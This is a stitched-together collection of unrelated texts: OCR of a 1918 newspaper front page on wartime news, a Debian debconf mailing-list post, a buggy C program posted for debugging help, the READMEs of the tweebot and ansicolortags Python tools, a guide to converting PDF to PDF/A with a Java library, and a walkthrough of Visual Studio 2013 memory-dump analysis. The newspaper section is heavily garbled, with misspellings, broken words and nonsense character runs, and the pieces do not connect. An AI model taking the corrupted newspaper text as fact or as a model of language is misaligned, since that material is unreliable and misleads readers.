fleet should have, Invaded the Haiti Aa in attnek th German fleet nuerating against' Rusian port on th Baltld. 1 T ; LIST IS SMALLER ZXNDON, February JB (Asso ciated. Pre) British casualties In all of th war tboaWra war again below ti. avaraga of past week of tha war for th' vn day period which nde4 Saturday night aa waa shown in th com munique front th war depart ment issued yesterday. Tor tha first tUn In many week tha total 1 wU mid sr fly thoaaaad. Doth in action or aa tk re sult of wound reciyd In action ar announced to hay numbered 1043 f wbkk thlrtr-lgbt were oflken and 1006 war ullstad man. 
Th list of wounded and mlssinf number 8063 of which 119 war offlcm and SB44 war nlitd mtan.' . .. ..'-. - , TO INSPECT CATTLE MKXICO CITT, February lB-fAsso-eisted Pre Th government ban de cided to enforce ttrirtly measure to prevent the importation Into Mexico from the I'nited Btate of tubercular nattle. It i asserted tbat the bringing In of diseased cattle from north, of the Rio Orande, wher tha American meat inKpeetion aervie make their slaughter impossible, ba ' caused epidemic In Mexico. " , . RESUMPTION OF WA&ON RUSSIA AROUSING Kdisers Forces Cross Dviha Despite ; . Warnings . Issiied By press W;y ' , v of Austria : ; : ri OPENHAGEN, February ': 19 X- ; tween Germany and Russia flnfoo hatio rrncaort thn Pluino IVI ItUIU VI VvwVU . ilW VKIIU ..iif... 4W- n : . opposilian, the Russian remnants ; I Germany has struck in the face of the openly expressed oppo sition of her ally. Austro-Hunoary, and what is regarded as a deep schism has resulted between Berlin and Vienna. Diplomats in the Altiid and neutral capitals are watching keenly for some signs that wh) indicate the Austrian attitude in the face of the German defi ance of their wishes and announcements. ' . r .(. . , ' . 7 PRESS WARNS BERLIN ' : r V M ; , The Austrian press, for the past several days has been warn ing Germany against reopening hostilities on the eastern ' front which is opposed to every' Austrian desire. . Veiled. threats of a possible. withdrawal by. Austria from the Teutonic alliance. have been published and the desire of the Austrian people, for peace with Russia has been emphasized. .. . .' .;,v v The resumption of activities by the German army on the North Russian frnnt has hfiPn nffir.lallv 4 V A 4 4ta rnnMelM aAA l,u" u ww iiioii w uaacu jiio vima wii uui uiy uio aaiJni Ia. m mix iamma MAiNM Mitinn (ka aewia it tn A naniAel a 4fMn. MsisMiei. tice closed. ..:, " -. '...'-v ;-- 7; . 
FIRST OFFENSIVE TOLD )r, ; i i r wvvhiuiVii ' i win - wivrnrriivMs fwvtvw w wwiu fcvil iw f uivilf which publishes a Berlin statement that, the German first offensive will be directed against the Bolshevik! army in Esthonia and Livo nia now fjuarding the land approaches to Petroqrad. . UU..LU PUT U..DERARREST V-)V;-S" e , Senator ' Humbert ,: Taken ; Into A Custody In Connection With " Caiilaux Charges - TARIB, . Febrnary . 1 19- Associated TresH) Following directly In the wnke of the conviction of 8ol Pasha eame tke arrest of ', fenato. Humbert, pnb lisher of L Jouraal yesterday morning, His arrest had been expected and is ia liue with the expressed policy. of Clera eneeau when he assumed flic to run down aad ' punish all those connected with the -alleged Caiilaux aonaplracy. lit Was in Le Joii.nnl that th propa ganda of Caillonx and Harrail was pub lished for kbg time nnd nntil th publisher , wa finally . peremptorily halted. It U In connection with this that he wa arrested v and -upon uch publication and the alleged nubiidis ing of kia paper Win trial for conspiracy and treason will, ba based. Holo Pasha is said to have beea a stockholder la ' (Senator .. Humbert's paper. -.fi'?:-.-0''' ':" MONEY IS NEEDED TO SPEED. SHIPBUILDING uppiementary ' Appropriation of Hundred fAillion Asked WASHtKGTONV February 19 (As- sorlated Press) One hundred million dollars to speed - ntt shin building of the merchant fleet and for the purchase and construction of craft that can be used for hunting down and destroy ing enemy submarines is included ia sumdementary ' appropriation estimate which wer reported yesterday. . The billion doner urgent aenvienry bill passed th hcAis yesterday and is e pee ted ' to go, to the senate to day. As it ha the 'right of 'wv over all other legislation Its passage ia con fidently expected -before the ead of the week. --rr v ' . . ' . r. NEW YORK. February 10 (Assoc! 
sled Press) To Colonel Roosevelt, still in the hospital but now steadily recup ernting from bieJreCent aeriou illnes nd th operation for its relief, ramu the new yesterday of the birth of an other grand child,' his eighth grand son. The former President was told of the birth of a aon to Mr. and Mrs. Archie Rooserelt. ROOSEVELT ARRIVES WRATH I?. (Associated Press 'War bo has been resumed. German anrf aro ftiiahlnrt fnruirrl Ufithmit CAMM Ml W. UUUI I1IIU IWI nl fllUIVUI . .tn ' failing back or surrendering announcer! frnm Berlin. ivhrrA it A J 4lai MtiLM Msen C Aluweletii 4l.k mnfrTiTP ' n m i-y f " j Senate Committee Is Warr.cl f Something Must Be Done To-. " J .Keep Substitutes Available ;' WABHIXOTON. Fobmary 19 (A aoeiate.l ' Press) W'heatlcsa , weeks in . atead of wheatlesa days is an immi-- Bent drtnirer, C. H. Hyde of the Okla homa Counoil of . Pefens yesterday told the senate committee-on aerieul ture. ., His assertion ws made in con nection with his testimony on fond eon d it ions and the aoaring pries of wheat substitutes now greatly in demand by' reasoa of the regulation of ,the food administration far the conservation of Wheat. ','..- ..:.. v; ., - ' I'nless some steps taken to regn . late price of these - commodities aa wheat prieea. bav bee regulated, h believes they will rise t such figure to make their nn prohibitive with th bakrra and Iti.-people other than th wealthy., '. ; ' ,, v . , . . . '' ' t i i ill 4 f s . ' 1 ' ' MM OKIGIS Patrois : rjeet and Considerable Losses To Teutons Report-: edJFrom London ; r' NEW YORK, February " 10 f Asai. riated "Press) Patrol' encounters eul reconnoitering . niitl continue in most seetore of . the Western front, accord ing to the .report of yesterday. Thar is no cassation of th artillery fir nnd ' th great Teuton, driv is still 1 abey ance. .. . '' . . - ...' Patrol encounter ' war reported In th British official despatches : on tho Measinea sectors with considerable lose- : e inflicted on th Huns. , ,,. 
., Along the Arra-Cambral road tho enemy wa directing a heavy artillery ; nr against Allied positions. ) ' ',.-', General Pershing completed a day of Inspection-in the American front line trenches on, th sector taken over br ' the Yankees. .,:' .. .; . , Protected tv ? tK' ; helmet worn W the American forces. the commauder . walked through ' tho first Un trench nnd visited all th bat teries nnd dugout. He sked Innumer-v sldo questions, especially regarding th food which tho American nr getting. One cook Answered him with oroo eritldw of the food, ying that it lack variety. : "'':, : .k Pershing mad a few auRgestion on various points. Wb.il walking through on trench he slipped and hurt hi an kia slightly. . , y .- .,. . Uisolosure that portugqes troop ar operating o th French front a fr north a is'euy Chapella were mad when the War office announced that tho Portuguese hav taken prisoners in that neighborhood. - , . ' .. RECO CHIEF ACTIVITY A';; , ,S. 'V'' ,:.' 4."' xml | txt
http://chroniclingamerica.loc.gov/lccn/sn83025121/1918-02-19/ed-1/seq-1/ocr/
Colin Watson wrote:
> Can you point me to where I would find the old spec? I see comments
> about it in debconf's svn log, but the actual files don't seem to be in
> the history ...

Seems well and truly lost. I may have included it in the deb w/o including it in cvs.

A container is the reason why the debconf question namespace allows "leaf" nodes to contain nodes. If you have a container foo/bar, and questions foo/bar/a, foo/bar/b, and foo/bar/c, then inputting foo/bar should prompt for the three nested questions. This was also supported in templates, so you might get the foo/bar container questions by REGISTER foo/template foo/bar.

Of course, containers can also be nested.

-- see shy jo
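Since the draft spec itself is lost, its exact syntax can't be checked, but the behaviour described would presumably have been driven by templates along these lines. The "container" type name and the foo/bar names below are invented purely for illustration:

```
Template: foo/bar
Type: container
Description: A group of related questions

Template: foo/bar/a
Type: string
Description: First nested question

Template: foo/bar/b
Type: boolean
Description: Second nested question

Template: foo/bar/c
Type: string
Description: Third nested question
```

With a layout like that, a config script asking db_input on foo/bar would prompt for foo/bar/a, foo/bar/b and foo/bar/c in one go.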
https://lists.debian.org/debian-boot/2005/04/msg00656.html
Hi all,

First of all, thanks for all your earlier responses. Here I have a problem debugging the code below. It builds without any errors, but it doesn't run correctly: the exe file I created doesn't create a file in the C:\Temp directory. Could anyone debug this? I built the code in VS2005 as a C project. Is there any change to be made in the system environment setup, or in the Visual Studio settings? I have been facing this problem for the last 48 hours.

Here, GVS = C:\temp

-------------------------------------------------test2.cpp--------------------------------

#include <stdio.h>
#include <stdlib.h>

#define ARG_ERROR 1

int main(int argc, char **argv)
{
    FILE *fperr;
    char CARTERR[255];

    while(argc--)
        printf("%s\n", *argv++);

#ifdef WIN32
    sprintf( CARTERR,"%s\\%s",getenv("GVS"),_CARTERR);
#endif

    if( argc < 3) {
        printf( "Error in document\n");
        fperr = fopen( CARTERR,"w");
        fprintf( fperr,"%d:Error %s",ARG_ERROR);
        fclose( fperr);
        return( ARG_ERROR);
    }
    exit(EXIT_SUCCESS);
}
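A few likely culprits stand out in the posted code: _CARTERR is never defined anywhere, the while (argc--) loop zeroes argc before the argc < 3 test, the fprintf format string expects two arguments but is given only one, and the results of getenv and fopen are never checked. A corrected sketch along those lines is below; the file name and error message are assumptions, since the original _CARTERR macro isn't shown in the post.

```c
#include <stdio.h>
#include <stdlib.h>

#define ARG_ERROR 1
#define CARTERR_FILE "carterr.txt"   /* assumption: the post never defines _CARTERR */

/* Build "<gvs>\<name>" into buf; returns buf, or NULL if gvs is NULL. */
static char *build_carterr_path(char *buf, size_t len, const char *gvs, const char *name)
{
    if (gvs == NULL)
        return NULL;                 /* getenv("GVS") can fail: check it */
    snprintf(buf, len, "%s\\%s", gvs, name);
    return buf;
}

static int run(int argc, char **argv)
{
    char carterr[255];
    int i;

    for (i = 0; i < argc; i++)       /* print the args without clobbering argc */
        printf("%s\n", argv[i]);

    if (argc < 3) {
        printf("Error in document\n");
        if (build_carterr_path(carterr, sizeof carterr, getenv("GVS"), CARTERR_FILE) != NULL) {
            FILE *fperr = fopen(carterr, "w");
            if (fperr != NULL) {
                /* format string and argument list now match */
                fprintf(fperr, "%d: error, too few arguments\n", ARG_ERROR);
                fclose(fperr);
            }
        }
        return ARG_ERROR;
    }
    return EXIT_SUCCESS;
}
```

Called from main as return run(argc, argv);, this version writes the error file only when the GVS environment variable actually exists, and still returns ARG_ERROR when too few arguments are supplied.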
https://www.daniweb.com/programming/software-development/threads/216005/error-in-debugging-c-code
tweebot

A simple twitter-bot command-line tool and library. tweebot is a twitter bot client, written in Python. It can be used as either a command-line tool, or as a library imported into your Python applications.

Requirements

- Python 3.3+
- A twitter account

Installation

This project is hosted on the PyPI package repository. To install:

    make install

Development

To build the dev environment:

    make venv
    . venv/bin/activate
    python main.py

Configuration

The application will only try to tweet if you provide a key file, which is formatted like:

    CONSUMER_KEY: dsafsafafsd
    CONSUMER_SECRET: iuhbfusdfiu44
    ACCESS_KEY: vjhbv99889
    ACCESS_SECRET: ivfjslfiguhg98

OR the equivalent JSON. The filename must be provided using the --keys command-line argument.

Command-line usage

Tweeting

To tweet a simple status update:

    tweebot --keys {twitter-key-file} tweet "Hello world, this is my Tweebot status update!" -vv

You can control verbosity with the number of vs. More command-line options are possible; try --help to see them all.

If you use - for the tweet text, the application will use standard input, which can be handy for piping info from your bots: use an arbitrary application to pipe to tweebot, which can tweet it out.

Following

To automatically follow new followers, and unfollow unfollowers:

    tweebot --keys {twitter-key-file} follow --auto

Library usage

There are two basic ways you can use this in a library: you can either import the TwitterClient class and control that from your application, or you can import tweebot's main function and provide it with a callback that will generate your status updates.

tweebot.main

If you provide a callable to tweebot.main, then tweebot will use it as a callback when the main function is called. The main method implements all the command-line tweebot arguments; the difference is that if the program is asked to tweet an empty status, it will instead tweet the result of your method, called with no arguments.

If you tweet a non-empty status, that string will be handed to your method, and the result will be tweeted:

    mytweebot --keys {twitter-key-file} tweet -vv

Thus, this provides a simple way to define new twitter-bots: define a method of the form:

    def my_tweet_builder(status, directives):
        new_status = do_something()
        return new_status  # or: return new_status, new_directives

This can either ignore the status it's given, or use it in any way you wish. If you have multiple bots that modify the status when given, then you could run them independently, or pipe them together in novel ways without recompiling: your choice.

Direct client use

If you want your application to be in control, you can simply import tweebot.TwitterClient and use its methods directly. This includes direct API access (via tweepy) to twitter, and a few custom convenience methods.
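The callback contract described above is easy to prototype without touching Twitter at all. The sketch below is a plain function following the documented (status, directives) shape; tweebot itself is not imported here, and the particular transformations are invented for illustration:

```python
def my_tweet_builder(status, directives):
    """A tweebot-style callback: build a status from scratch, or transform one.

    When tweebot is asked to tweet an empty status, the callback is invoked to
    generate one; otherwise the given status is handed in to be transformed.
    """
    if not status:
        # Invented placeholder content; a real bot would compute something here.
        return "Hello from my bot!"
    # Non-empty input: decorate and pass along, so bots can be chained together.
    return status.upper()
```

Because the output of one such bot can be piped into another on the command line, a chain of these callbacks composes without recompiling anything.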
https://pypi.org/project/tweebot/
Converting PDF to PDF/A with the BFO Java PDF Library v2.26

We first added PDF/A support to our API many years ago, but our focus was on validation - you load a PDF, and the API tells you if it's valid or not. If a file isn't PDF/A and you need it to be, we've got a method to fix that too: OutputProfiler.apply(). Give this method a target OutputProfile, such as PDF/A-1b:2005, and it will adjust the PDF to match. But in many cases the PDF was beyond what we could repair, and apply() threw an Exception indicating conversion failed. At that point your only real option was to rasterize each page to a bitmap image to replace the original, perhaps even copying those pages to a new PDF if the original had content we couldn't repair.

This is how we've done things for years, and while it works, there were two main problems with it:

- You, the developer, had to write quite a lot of code to manage the process - checking for failures, choosing the correct ColorSpace, deciding what to do if conversion failed. These decisions meant that a "one click" solution was hard for us to offer.
- Conversion to bitmap happened more than it needed to, and it's slow. What's more, when it happens something is usually lost in the process. Most obviously the text is no longer searchable, but potentially more, depending on how much work the developer has put in to "salvage" content from the original PDF: metadata, bookmarks and so on.

We've helped many customers doing variations on this same task, and it seemed the right time to bring it in-house and package it up to make it easier. A couple of weeks' work, we figured. Well, four months later, it turns out we figured wrong. But the new approach is quite an improvement. So what follows below is a step-by-step guide to the process. These steps are also wrapped up in a new example, ConvertToPDFA.java (download), which we now ship with the API.
It's a standalone class designed to be incorporated into your code, with a main method so you can test from the command line. We've run this over 17,000 test files here, converting all to PDF/A-1, A-2 and A-3, comparing the results to both Acrobat and veraPDF. We're confident it will handle whatever PDF you feed it. Here's how it works.

The basics: Setup and Fonts

PDF/A requires all visible text to be rendered in an embedded font, so the first thing you're going to need for conversion to PDF/A is a set of fonts for substitution. But which ones? Based on a survey of our test files here, the most common unembedded fonts are, in order:

- Times
- Helvetica
- Arial
- Courier
- Symbol
- ZapfDingbats
- Arial Narrow
- Helvetica Narrow
- Helvetica Black
- Palatino
- Letter Gothic
- New Century Schoolbook
- Tahoma
- Verdana

Of course this is very western-centric, as we've been bulk testing with the GovDocs Corpora. Chinese/Japanese/Korean documents have a much higher proportion of unembedded fonts due to their size and the fact their glyphs have regular metrics, whereas Cyrillic, Arabic, Hebrew, Hindi etc. fonts will almost always be embedded. So we don't recommend you include all of those.

Many uses of Times, Helvetica, Courier and almost all of Symbol or ZapfDingbats refer to the Standard 14 PDF fonts, which have a predefined set of glyphs. We include free substitutions for those with the API. For the rest, if we can't find a match based on the font name, we'll ensure we choose a font that has all the required glyphs and the most similar metrics to the font it's replacing.

What we recommend is including the Times, Arial, and Courier fonts that ship with Windows (assuming you're running Windows). Don't forget the bold and italic variations. We also recommend at least one of the Noto CJK fonts, typically NotoSansCJKsc-Regular.otf, and ideally a narrow sans-serif font, such as Arial-Narrow, which will serve as a match for any narrow fonts.

In total that's about 15 fonts. Here's how we'd set up the OutputProfiler, giving it some fonts to substitute:

import org.faceless.pdf2.*;
import java.util.*;
import java.io.*;
import java.awt.color.ColorSpace;

PDF pdf = new PDF(new PDFReader(new File("input.pdf")));
OutputProfiler profiler = new OutputProfiler(new PDFParser(pdf));
OutputProfile profile = profiler.getProfile();

OutputProfile target = OutputProfile.PDFA1b_2005;
if (profile.isCompatibleWith(target) == null) {
    return "PDF is already compatible with PDF/A-1b";
}

// We need to convert the PDF. Load some fonts.
OutputProfiler.AutoEmbeddingFontAction fa = new OutputProfiler.AutoEmbeddingFontAction();
fa.add(new OpenTypeFont(new File("path/to/NotoSansCJKsc-Regular.otf"), null));
fa.add(new OpenTypeFont(new File("path/to/times.ttf"), null));
fa.add(new OpenTypeFont(new File("path/to/timesi.ttf"), null));
fa.add(new OpenTypeFont(new File("path/to/timesbd.ttf"), null));
fa.add(new OpenTypeFont(new File("path/to/timesbi.ttf"), null));
fa.add(new OpenTypeFont(new File("path/to/arial.ttf"), null));
fa.add(new OpenTypeFont(new File("path/to/ariali.ttf"), null));
// etc
profiler.setFontAction(fa);

Color

Conversion also requires that all device-dependent color is made device-independent/calibrated, and choosing the best way to do this is the most complicated aspect of any PDF/A conversion. The example below shows the basics, but we'll expand on this later (and in the ConvertToPDFA.java example too).

The best approach is to assign the PDF an Output Intent, which describes the ICC Color Profile of the device the document is intended for. But this is just a single ICC profile; if your PDF has both device-dependent RGB and device-dependent CMYK then previously your only option was to rasterize. This release expands the existing ProcessColorAction object which you supply to the OutputProfiler to convert color. You can now supply it with a number of ColorSpace objects - some RGB, some CMYK - and it will choose the appropriate ones to anchor device-dependent colors that don't match the Output Intent to an ICC profile.

Which profiles should you supply? In Europe, we recommend FOGRA39 ("Coated FOGRA 39 300" is a good choice), and in the Americas we recommend SWOP2013. In Japan, "Japan Color 2011". ICC profiles for all of these are available for download. Java color is entirely based on sRGB, so that's usually the best choice for RGB. Always supply at least one RGB and one CMYK to ensure conversion can succeed.

// We usually want our OutputProfile to have an "Output Intent", so choose
// one. We'll go with the FOGRA CMYK profile for now, but see below
// for some real-world advice
target = new OutputProfile(target);
ColorSpace fogra39 = new ICCColorSpace(new File("Coated_Fogra39L_VIGC_300.icc"));
ColorSpace srgb = ColorSpace.getInstance(ColorSpace.CS_sRGB);
OutputIntent intent = new OutputIntent("GTS_PDFA1", null, fogra39);
target.getOutputIntents().add(intent);

List<ColorSpace> cslist = new ArrayList<>();
cslist.add(srgb);
cslist.add(fogra39);
OutputProfiler.ProcessColorAction action = new OutputProfiler.ProcessColorAction(target, cslist);
profiler.setColorAction(action);

Strategy: what to do with the rest

Any conversion from PDF to PDF/A potentially involves data loss: for example, PDF/A-1 doesn't allow embedded files, so if they exist they need to be deleted. But an API can't just delete content from your document without your instruction! We need to give you, the developer, some control over this process. For that we have a new setStrategy() method. The Default strategy will not delete content from the PDF, and conversion may fail as a result - you can deal with it in your code. We have other strategies for conversion, and we suspect the most useful will be JustFixIt - it does whatever it takes to make the file compliant with your target profile. If we need to delete attached files, or remove digital signatures to do this, choose this strategy and we can.

profiler.setStrategy(OutputProfiler.Strategy.JustFixIt);

JustFixIt is a shorthand for a combination of several other strategies, so it's possible to customize the process. See the API docs for more detail.

Rasterizing where required, Rebuilding as a last resort

With PDF/A-1 in particular, we may have to rasterize the document due to features we just can't work around, such as transparency. With PDF/A-2 or later it's much less common (required on only 316 of our 100,561 test pages), but it can still happen: for example, if the PDF nests save/restore operations deeper than the recommended maximum of 26.

Where previously we would fail with an Exception and let you sort out the rasterization yourself, we now have a new Rasterizing Action which will do this for you. This approach means we'll only rasterize the pages that are causing problems, and we'll overlay the rasterized page with invisible text, retaining any structure on the page for the PDF structure tree. Text will remain selectable and searchable, and the PDF can continue to meet the requirements of PDF/A-1 or PDF/UA. (There will be cases where we can't overlay the text - for example, where the text on the page uses an undefined encoding. If this is the case, you'll just get the plain bitmap with no invisible text.)

OutputProfiler.RasterizingAction ra = new OutputProfiler.RasterizingAction();
ra.setDPI(200); // the default
profiler.setRasterizingAction(ra);

// Setup all done! Convert the PDF to PDF/A
profiler.apply(target);

Even after all of this, there are still cases where the resulting PDF is not PDF/A. Most likely this is due to fundamental architectural limits (such as arrays with more than 8191 entries) which are just not allowed. All we can do here is "rebuild" - clear out the PDF entirely, then put back only data which we know is OK.
The AutoConformance strategy (part of the JustFixIt strategy) lets us adjust conformance to match the PDF, essentially following the above policy. With this Strategy, use the "A" conformance level (the strictest one) as a target. PDF/UA, ZUGFeRD and PDF/X are a little different - we don't want to actively change the document to match these targets, but if the PDF already complies with one of these then we don't want to lose that. Another slight adjustment: OutputProfile target = OutputProfile.PDFA1a_2005; Collection<OutputProfile> allowed = Arrays.asList(OutputProfile.PDFA1b_2005, OutputProfile.PDFA1a_2005, OutputProfile.PDFA2a); Collection<OutputProfile> retained = Arrays.asList(OutputProfile.PDFUA1, OutputProfile.PDFX4, OutputProfile.ZUGFeRD1_Basic, OutputProfile.ZUGFeRD1_Comfort, OutputProfile.ZUGFeRD1_Extended); Collection<OutputProfile> claimed = profile.getClaimedOutputProfiles(); for (OutputProfile p : claimed) { if (allowed.contains(p)) { target = p; break; } } target = new OutputProfile(target); for (OutputProfile p : claimed) { if (retained.contains(p) && profile.isCompatibleWith(p) == null) { try { target.merge(p, profile); } catch (ProfileComplianceException e) { // Combination is not possible. } } } To keep things simple, we haven't shown how to remove a claim of PDF/UA etc. if it can't be met. It's shown in the attached example. What do I use for an OutputIntent? CMYK or RGB? Your first choice will typically be to reuse any OutputIntent in the original document; the original author knows best. We can only reuse it if its valid for PDF/A, but this test is fairly easy - we extend the above code that sets our "target" like so: for (OutputIntent intent : profile.getOutputIntents()) { if (intent.isCompatibleWith(target) == null) { target.getOutputIntents().add(new OutputIntent("GTS_PDFA1", intent)); } } But if after that you still don't have a GTS_PDFA1 OutputIntent, you'll need to choose either CMYK or RGB. 
Unfortunately this is a slightly complicated choice to make - Acrobat, and possibly other tools, make a decision on whether to display a PDF with simulated overprint or not based on a few factors, one of which seems to be the Output Intent of the document. So this choice is significant. The ad-hoc algorithm we're using is subject to revision, but is currently: if the PDF makes use of Overprint, CMYK blending, has a Cyan, Magenta or Yellow separation, or if it doesn't make use of device-dependent RGB color, it's probably best to use CMYK. Otherwise, we use RGB. To implement this, we add this block after the block above. if (target.getOutputIntents().isEmpty()) { boolean cmyk = false; for (OutputProfile.Separation s : profile.getColorSeparations()) { String n = s.getName(); cmyk |= n.equals("Cyan") || n.equals("Magenta") || n.equals("Yellow"); } cmyk |= profile.isSet(OutputProfile.Feature.TransparencyGroupCMYK); cmyk |= profile.isSet(OutputProfile.Feature.Overprint); cmyk |= !profile.isSet(OutputProfile.Feature.ColorSpaceDeviceRGB); ColorSpace cs = cmyk ? fogra39 : srgb; OutputIntent intent = new OutputIntent("GTS_PDFA1", null, cs); if (intent.isCompatibleWith(target) == null) { target.getOutputIntents().add(intent); } } Other options you might want to consider are reusing an ICC profile from the incoming PDF, and keeping any existing non-PDF/A Output Intents - a PDF can be both PDF/A and PDF/X-4, with two Output Intents, so long as they both refer to the same color space (although earlier versions of PDF/X disallow this). The attached example shows how to do both. Conclusion The ConvertToPDFA.java example (download) encapsulates everything described above. It's a reusable class which you can incorporate in your own project, and if you're in the business of converting PDF to PDF/A, we hope it's going to make your life a lot easier. The example is also included in the examples folder of the PDF library download. 
In the event the process needs revising, we'll keep this article (and the example) up to date with footnotes. In particular conversion to PDF/A-4 has only had minimal testing at this point, so watch this space.
https://bfo.com/blog/2021/08/04/converting_pdf_to_pdf_a/
ansicolortags

ansicolortags is a Python script and module to simply and efficiently use ANSI colors in a command-line Python program. The ansicolortags module provides an efficient and useful function (printc) to print colored text in a terminal application with Python 2 and 3, with an HTML-tag like style:

from ansicolortags import printc  # Import the function
# ...
printc("France flag is <blue>blue<reset>, <white>white<reset>, and <red>red<reset>!")

will print the text "France flag is blue, white and red!" with appropriate colors (if the output supports them -- a terminal should, but a file or a pipe should not). All ANSI color codes are defined with this HTML-tag like style: <blue>, <red>, etc. This point is the main interest of this module, because other modules only define functions to print with some colors. For instance, the screenshot below shows the module being used to print colored text (the help of the script).

Language

Python v2.7+ or Python v3.1+. This project is hosted on the PyPI package repository.

Documentation

The complete documentation of the module is available, see here on readthedocs.io. All the details (installation, options, etc.) are in the doc. Anyway, here is some information.

Installation

The project consists of just the main script ansicolortags.py. To install it, download the archive from this git repository, extract it, then launch python setup.py install in the directory. More details can be found in the INSTALL file.

Dependencies

The project is entirely written in Python, compatible with both versions 2.7+ and 3.1+. For more details about the Python language, see the official site.

Platforms

The project has been developed on GNU/Linux (Ubuntu 11.10 to 15.10).

Warning: Windows?
It has also been quickly tested on Windows 7 with the Cygwin environment and Python 2.7.

Warning: Mac OS X?

It should also work on Mac OS X, but it has not been tested. Any feedback on this is welcome!

Contact me

Feel free to contact me with a Bitbucket message (my profile is lbesson), or via an email at lilian DOT besson AT ens-cachan DOT org.

License

This project is released under the MIT License.
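As an aside, the HTML-tag-like substitution that printc performs can be sketched in a few lines of plain Python. This is a hypothetical, simplified re-implementation for illustration only; the real module defines many more tags and options:

```python
import re
import sys

# Minimal tag-to-ANSI mapping (illustrative; the real module defines many more tags).
ANSI = {"red": "\033[31m", "blue": "\033[34m", "white": "\033[37m", "reset": "\033[0m"}

def colorize(text, enabled=True):
    """Replace <tag> markers with ANSI codes, or strip them when colors are disabled."""
    def sub(match):
        return ANSI.get(match.group(1), "") if enabled else ""
    return re.sub(r"<(\w+)>", sub, text)

# Only emit color codes when stdout is a terminal, not a file or a pipe.
print(colorize("France flag is <blue>blue<reset>!", enabled=sys.stdout.isatty()))
```

The key design point is the one the module advertises: tags are stripped rather than emitted when the output does not support colors, so the plain text stays readable in files and pipes.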
https://bitbucket.org/lbesson/ansicolortags.py
Update: Note this post has been updated for Visual Studio 2013 RTM and is the first of a two-part series. In the screenshots and examples, Just My Code and Collapse Small Objects are disabled, as covered in part 2. It is recommended that you read this post before reading part 2.

In this post, I'll first discuss common types of memory problems and why they matter. I'll then walk through an example of how to collect data, and finally describe how to use the new functionality to solve memory problems in your applications. Before I begin, there are a few things to note about the "Debug Managed Memory" feature discussed in this post:

- The option will only be available from the dump summary page in the Ultimate version of Visual Studio 2013. If you are using Premium or Professional you will not see the option.
- The process the dump file was collected against must have been running on .NET 4.5 or higher. If the dump was collected on 3.5 or earlier the option will not appear; if it was collected on 4.0 it will fail to launch with an error message.

Why worry about memory problems

.NET is a garbage collected runtime, which means most of the time the framework's garbage collector takes care of cleaning up memory and the user never notices any impact. However, when an application has a problem with its memory, this can have a negative impact on both the application and the machine.

- Memory leaks are places in an application where objects are meant to be temporary, but instead are left permanently in memory. In a garbage collected runtime like .NET, developers do not need to explicitly free memory as they do in a runtime like C++. However, the garbage collector can only free memory that is no longer being used, which it determines based on whether the object is reachable (referenced) by other objects that are still active in memory. So a memory leak occurs in .NET when an object is still reachable from the roots of the application but should not be (e.g. a static event handler references an object that should be collected). When memory leaks occur, usually memory increases slowly over time until the application starts to exhibit poor performance. Physical resource leaks are a sub-category of memory leaks where a physical resource such as a file or OS handle is accidentally left open or retained. This can lead to errors later in execution as well as increased memory consumption.
- Inefficient memory use is when an application is using significantly more memory than intended at any given point in time, but the memory consumption is not the result of a leak. An example of inefficient memory use in a web application is querying a database and bringing back significantly more results than are needed by the application.
- Unnecessary allocations. In .NET, allocation is often quite fast, but the overall cost can be deceptive, because the garbage collector (GC) needs to clean it up later. The more memory that gets allocated, the more frequently the GC will need to run. These GC costs are often negligible to the program's performance, but for certain kinds of apps, these costs can add up quickly and make a noticeable impact on the performance of the app.

If an application suffers from a memory problem, there are three common symptoms that may affect end users.

- The application can crash with an "Out of Memory" exception. This is a relatively common problem for 32-bit applications because they are limited to only 4GB of total virtual address space. It is however less common for 64-bit applications because they are given much higher virtual address space limits by the operating system.
- The application will begin to exhibit poor performance. This can occur because the garbage collector is running frequently and competing for CPU resources with the application, or because the application constantly needs to move memory between RAM (physical memory) and the hard drive (virtual memory), which is called paging.
- Other applications running on the same machine exhibit poor performance. Because the CPU and physical memory are both system resources, if an application is consuming a large amount of these resources, other applications are left with insufficient amounts and will exhibit negative performance.

In this post I'll be covering a new feature added to Visual Studio 2013 intended to help identify memory leaks and inefficient memory use (the first two problem types discussed above). If you are interested in tools to help identify problems related to unnecessary allocations, see .NET Memory Allocation Profiling with Visual Studio 2012.

Collecting the data

To understand how the new .NET memory feature for .dmp files helps us to find and fix memory problems, let's walk through an example. For this purpose, I have introduced a memory leak when loading the Home page of a default MVC application created with Visual Studio 2013. However, to simulate how a normal memory leak investigation works, we'll use the tool to identify the problem before we discuss the problematic source code.

The first thing I am going to do is launch the application without debugging to start the application in IIS Express. Next I am going to open Windows Performance Monitor to track the memory usage during my testing of the application. Next I'll add the ".NET CLR Memory -> # Bytes in all Heaps" counter, which will show me how much memory I'm using in the .NET runtime (which I can see is ~3.5 MB at this point). You may use alternate or additional tools in your environment to detect when memory problems occur; I'm simply using Performance Monitor as an example. The important point is that a memory problem is detected that you need to investigate further.

The next thing I'm going to do is refresh the home page five times to exercise the page load logic.
After doing this I can see that my memory has increased from ~3.5 MB to ~13 MB, so this seems to indicate that I may have a problem with my application's memory, since I would not expect multiple page loads by the same user to result in a significant increase in memory. For this example I'm going to capture a dump of iisexpress.exe using ProcDump, and name it "iisexpress1.dmp" (notice I need to use the -ma flag to capture the process memory, otherwise I won't be able to analyze the memory). You can read about alternate tools for capturing dumps in what is a dump and how do I create one?

Now that I've collected a baseline snapshot, I'm going to refresh the page an additional 10 times. After the additional refreshes I can see that my memory use has increased to ~21 MB, so I am going to use procdump.exe again to capture a second dump I'll call "iisexpress2.dmp".

Now that we've collected the dump files, we're ready to use Visual Studio to identify the problem.

Analyzing the dump files

The first thing we need to do to begin analysis is open a dump file. In this case I'm going to choose the most recent dump file, "iisexpress2.dmp". Once the file is open, I'm presented with the dump file summary page in Visual Studio that gives me information such as when the dump was created, the architecture of the process, the version of Windows, and what version of the .NET runtime (CLR version) the process was running. To begin analyzing the managed memory, click "Debug Managed Memory" in the "Actions" box in the top right. This will begin analysis.

Once analysis completes I am presented with Visual Studio 2013's brand new managed memory analysis view. The window contains two panes: the top pane contains a list of the objects in the heap grouped by their type name, with columns that show me their count and total size.
When a type or instance is selected in the top pane, the bottom one shows the objects that are referencing this type or instance, which prevent it from being garbage collected. [Note: At this point Visual Studio is in debug mode since we are actually debugging the dump file, so I have closed the default debug windows (watch, call stack, etc.) in the screenshot above.]

Thinking back to the test scenario I was running, there are two issues I want to investigate. First, 16 page loads increased my memory by ~18 MB, which appears to be an inefficient use of memory since each page load should not use over 1 MB. Second, as a single user I'm requesting the same page multiple times, which I expect to have a minimal effect on the process memory; however, the memory is increasing with every page load.

Improving the memory efficiency

